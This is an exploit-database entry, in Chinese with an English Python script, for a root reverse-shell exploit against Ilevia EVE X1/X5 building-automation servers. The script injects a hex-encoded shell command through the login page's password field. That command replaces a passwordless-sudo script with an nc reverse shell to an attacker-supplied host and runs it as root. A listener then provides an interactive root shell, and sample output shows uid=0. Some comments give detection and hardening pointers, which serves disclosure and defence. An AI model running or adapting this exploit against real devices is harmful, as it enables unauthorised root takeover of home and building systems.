Ilevia EVE X1/X5服务器4.7.18.0.eden反向Rootshell硬件远程漏洞利用

本文详细分析了Ilevia EVE智能家居自动化服务器中的sudoers文件错误配置漏洞,该漏洞允许攻击者通过恶意脚本获取root权限。包含完整的Python漏洞利用代码实现反向shell连接和权限提升过程。

Ilevia EVE X1/X5 Server 4.7.18.0.eden - 反向Rootshell - 硬件远程漏洞利用

漏洞信息

EDB-ID: 52437
CVE: N/A
作者: LiquidWorm
类型: 远程漏洞
平台: 硬件
日期: 2025-09-16

漏洞描述

Ilevia EVE是一款智能家居和楼宇自动化解决方案,适用于住宅和商业环境。EVE X1服务器是专为高级楼宇自动化需求设计的专用硬件解决方案。

漏洞摘要: sudoers文件中的错误配置允许通过sudo免密码执行特定的Bash shell脚本,从而暴露出严重的权限提升漏洞。当这些脚本可被面向Web的用户(www-data)写入,或可通过命令注入途径被修改时,攻击者可以用恶意负载覆盖或替换它们。这些脚本经sudo执行时以提升后的权限运行,使攻击者能够远程获得完整的root访问权限。根本原因在于免密码sudo规则所引用的脚本对低权限的Web用户可写;排查时应核对sudoers中每一条NOPASSWD规则所指向的文件及其上级目录是否仅root可写。

技术细节

受影响版本: <= 4.7.18.0.eden (逻辑版本: 6.00)
测试环境:

  • GNU/Linux 5.4.35 (armv7l)
  • GNU/Linux 4.19.97 (armv7l)
  • Armbian 20.02.1 Buster
  • Apache/2.4.38 (Debian)
  • PHP Version 7.3.14

漏洞利用代码

#!/usr/bin/env python
#
# Ilevia EVE X1/X5 Server 4.7.18.0.eden反向Rootshell
#

import telnetlib
import threading
import requests
import socket
import time
import sys

def init_quantum(target_data):
    """Normalise the target argument into a base URL with a scheme and a port.

    A target with neither "http://" nor "https://" anywhere in it gets
    "http://" prepended. If the text after the first "//" contains no ":",
    ":80" is appended -- this also applies to https targets, and a colon
    anywhere in a path counts as a port being present. Trailing slashes are
    stripped from the result.
    """
    has_scheme = "http://" in target_data or "https://" in target_data
    if not has_scheme:
        target_data = "http://" + target_data

    # Only the segment right after the first "//" is inspected for a colon.
    after_scheme = target_data.split("//")[1]
    if ":" not in after_scheme:
        target_data = target_data.rstrip("/") + ":80"

    return target_data.rstrip("/")

def spark_neuroport(cyber_gate):
    """Start a background thread that listens on TCP port ``cyber_gate``.

    The thread accepts exactly one inbound connection on 0.0.0.0, probes it
    with ``pwd``, and then relays lines typed on stdin to the peer and prints
    what comes back. Returns the started (non-daemon) ``threading.Thread`` so
    the caller can ``join()`` it.

    Reviewer notes for defenders analysing this PoC:
    - The restore of the modified ``ilevia_reboot`` script is sent only when
      the operator types ``exit``. If the loop ends through the exception
      path, the replaced script and its ``.old`` copy are left in
      /home/ilevia/www-config/http/sh/ on the device.
    - Nothing in this function removes /tmp/pipe, so that FIFO remains as an
      artifact in either case.
    """
    def neuro_core():
        """Accept one connection and run the interactive relay loop."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # Listens on every local interface, not only the callback address.
            s.bind(("0.0.0.0", cyber_gate))
            s.listen(1)
            print(f"[+] Cyber-link active on 0.0.0.0:{cyber_gate}...")
            conn, addr = s.accept()
            print(f"[+] Pulse from {addr[0]}:{addr[1]}")
            # NOTE(review): holo_term is created but not used again in this
            # function; all I/O below goes through `conn` directly. telnetlib
            # is deprecated since Python 3.11 and removed in 3.13.
            holo_term = telnetlib.Telnet()
            holo_term.sock = conn

            print("[*] Probing matrix with 'pwd' signal...")
            conn.sendall(b"pwd\n")
            # Fixed wait before a single read of up to 4096 bytes.
            time.sleep(0.5)
            try:
                data_stream = conn.recv(4096).decode(errors='ignore')
                data_nodes = data_stream.splitlines()
                # Drop the first line when it is just the echoed command.
                if data_nodes and data_nodes[0].strip() == "pwd":
                    data_nodes.pop(0)
                output = "\n".join(data_nodes).strip()
                print("[+] Verifistring:", output)
                # The working directory is used as the success indicator: the
                # peer is expected to report a path under ilevia/www-config.
                if 'ilevia/www-config' in output:
                    print("[*] Synaptic intrusion confirmed, escalating to holo-shell...")
                    # Runs /bin/sh under script(1), logging to /dev/null.
                    # A `script` process spawned from the web application's
                    # process tree is a useful detection signal.
                    conn.sendall(b"script /dev/null -c /bin/sh\n")
                    time.sleep(0.5)
                    try:
                        # Read and discard whatever the peer printed.
                        _ = conn.recv(4096)
                    except:
                        pass
                else:
                    print("[!] Expected neural path not detected. Holo-shell may be unstable.")
            except Exception as e:
                print(f"[!] Error in synaptic probe: {e}")

            import select

            while True:
                try:
                    cmd = input("# ").strip()
                    if cmd == "exit":
                        # The hex-escaped bytes decode to a shell line that
                        # deletes /home/ilevia/www-config/http/sh/ilevia_reboot
                        # and moves ilevia_reboot.old back to that name,
                        # followed by a newline. This is the only place the
                        # original script is restored.
                        conn.sendall(b"\x72\x6d\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61\x2f"
                                     b"\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70\x2f"
                                     b"\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74"
                                     b"\x3b\x6d\x76\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61"
                                     b"\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70"
                                     b"\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f"
                                     b"\x74\x2e\x6f\x6c\x64\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76"
                                     b"\x69\x61\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74"
                                     b"\x74\x70\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62"
                                     b"\x6f\x6f\x74\x0a")
                        # Printed unconditionally; the peer's result is not
                        # read back, so the restore itself is not verified.
                        print("[+] ilevia_reboot restored.")
                        break
                    if not cmd:
                        continue
                    conn.sendall((cmd + "\n").encode())
                    response = b""
                    # Switch to non-blocking mode and poll for about 0.5 s;
                    # only data arriving inside that window is collected for
                    # this command.
                    conn.setblocking(0)
                    end_time = time.time() + 0.5
                    while time.time() < end_time:
                        ready = select.select([conn], [], [], 0.1)
                        if ready[0]:
                            try:
                                chunk = conn.recv(8160)
                                # Empty read: the peer closed the connection.
                                if not chunk:
                                    break
                                response += chunk
                            except:
                                break
                        else:
                            time.sleep(0.1)
                    conn.setblocking(1)
                    data_stream = response.decode(errors='ignore')
                    data_nodes = data_stream.splitlines()
                    clean_output = []
                    # Filter out the echoed command and bare prompt lines.
                    for line in data_nodes:
                        if line.strip() == cmd:
                            continue
                        if line.strip() in ["$", "#"]:
                            continue
                        clean_output.append(line)
                    if clean_output:
                        print("\n".join(clean_output).strip())
                except Exception:
                    # Any error (socket failure, EOF on stdin, ...) ends the
                    # session without sending the restore line above.
                    print("[!] Neural link terminated.")
                    break
            conn.close()

    # Default (non-daemon) thread: the process stays alive until it finishes.
    cyber_thread = threading.Thread(target=neuro_core)
    cyber_thread.start()
    return cyber_thread

def fire_photon(target_matrix, cyber_origin, cyber_gate):
    """Send one POST to ``target_matrix`` with the payload in ``passwd``.

    The form body carries ``userid`` = "inas" and ``passwd`` = a byte string
    that starts with ``;`` followed by shell commands. That shape is
    consistent with command injection through the login handler's password
    parameter; the server-side code is not shown on this page.

    Decoded, the payload performs these steps on the device:
    1. copies /home/ilevia/www-config/http/sh/ilevia_reboot to
       ilevia_reboot.old in the same directory;
    2. overwrites ilevia_reboot with a one-line script that creates the FIFO
       /tmp/pipe and connects /bin/sh to ``nc`` towards
       ``cyber_origin``:``cyber_gate``;
    3. marks ilevia_reboot executable;
    4. runs ilevia_reboot through ``sudo`` (the passwordless sudoers rule).

    Detection and hardening pointers that follow from the above: a
    ``passwd`` value in a POST to /ajax/php/login.php that contains ``;`` and
    shell syntax; creation of ilevia_reboot.old and /tmp/pipe; a change to
    ilevia_reboot's content; and ``sudo`` invoked by the web server account.
    Making the sudo-allowed script and its directory writable by root only
    removes step 2.
    """
    print(f"[*] Firing at {target_matrix}")
    # Hex-escaped so the command text is not readable at a glance; the two
    # f-string pieces splice in the callback address and port.
    payload = (b"\x3b\x63\x70\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61"
               b"\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70"
               b"\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f"
               b"\x74\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61\x2f\x77"
               b"\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70\x2f\x73"
               b"\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74\x2e"
               b"\x6f\x6c\x64\x3b\x65\x63\x68\x6f\x20\x22\x6d\x6b\x6e\x6f\x64\x20"
               b"\x2f\x74\x6d\x70\x2f\x70\x69\x70\x65\x20\x70\x3b\x20\x2f\x62\x69"
               b"\x6e\x2f\x73\x68\x20\x2d\x69\x20\x3c\x20\x2f\x74\x6d\x70\x2f\x70"
               b"\x69\x70\x65\x20\x7c\x20\x6e\x63\x20" +
               f"{cyber_origin}".encode() +
               b"\x20" +
               f"{cyber_gate}".encode() +
               b"\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x70\x69\x70\x65\x22\x20\x3e\x20"
               b"\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61\x2f\x77\x77\x77"
               b"\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70\x2f\x73\x68\x2f"
               b"\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74\x3b\x63\x68"
               b"\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x68\x6f\x6d\x65\x2f\x69\x6c\x65\x76\x69\x61\x2f\x77"
               b"\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74\x74\x70\x2f\x73\x68\x2f\x69\x6c\x65"
               b"\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74\x3b\x73\x75\x64\x6f\x20\x2f\x68\x6f\x6d\x65"
               b"\x2f\x69\x6c\x65\x76\x69\x61\x2f\x77\x77\x77\x2d\x63\x6f\x6e\x66\x69\x67\x2f\x68\x74"
               b"\x74\x70\x2f\x73\x68\x2f\x69\x6c\x65\x76\x69\x61\x5f\x72\x65\x62\x6f\x6f\x74")
    try:
        # No credentials are needed: the request goes to the login endpoint.
        requests.post(target_matrix, data={"userid":"inas","passwd":payload}, timeout=3)
        # Reached only if a response arrives within the 3 s timeout.
        print("[*] Photon fired.")
    except requests.exceptions.ReadTimeout:
        # Read timeouts are ignored silently -- presumably the request does
        # not return while the spawned shell is running; not shown here.
        pass
    except requests.exceptions.RequestException as e:
        print(f"[!] Photon failed: {e}")

def boot_sequence():
    """Command-line driver: parse three arguments and run the PoC steps.

    Expects ``<target_ip[:port]> <callback_ip> <callback_gate>``. Prints a
    usage message and exits with status 1 when the argument count is wrong or
    the port is not an integer. Otherwise it starts the listener thread,
    waits one second, sends the request to the target's
    /ajax/php/login.php endpoint, and blocks until the listener thread ends.
    """
    argv = sys.argv
    if len(argv) != 4:
        print(f"Usage: {argv[0]} <target_ip[:port]> <callback_ip> <callback_gate>")
        print("Example: python eve.py 1.2.3.4:8080 5.6.7.8 5555")
        sys.exit(1)

    _, target_data, cyber_origin, gate_text = argv
    try:
        cyber_gate = int(gate_text)
    except ValueError:
        print("[!] Cyber gate must be numeric.")
        sys.exit(1)

    login_endpoint = init_quantum(target_data) + "/ajax/php/login.php"
    listener = spark_neuroport(cyber_gate)
    # Give the listener thread time to bind before the request is sent.
    time.sleep(1)
    fire_photon(login_endpoint, cyber_origin, cyber_gate)
    listener.join()

# Run the command-line driver only when this file is executed as a script;
# importing the module has no side effects beyond the definitions above.
if __name__ == "__main__":
    boot_sequence()

使用示例

$ python rewteve.py 10.0.0.18:8080 10.0.0.4 5555
[+] Cyber-link active on 0.0.0.0:5555...
[*] Firing at http://10.0.0.18:8080/ajax/php/login.php
[+] Pulse from 10.0.0.18:46444
[*] Probing matrix with 'pwd' signal...
[+] Verifistring: /home/ilevia/www-config/http/ajax/php
[*] Synaptic intrusion confirmed, escalating to holo-shell...
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
[+] ilevia_reboot restored.

漏洞发现信息

发现者: Gjoko ‘LiquidWorm’ Krstic
安全公告ID: ZSL-2025-5959
安全公告URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5959.php
日期: 2024年5月1日
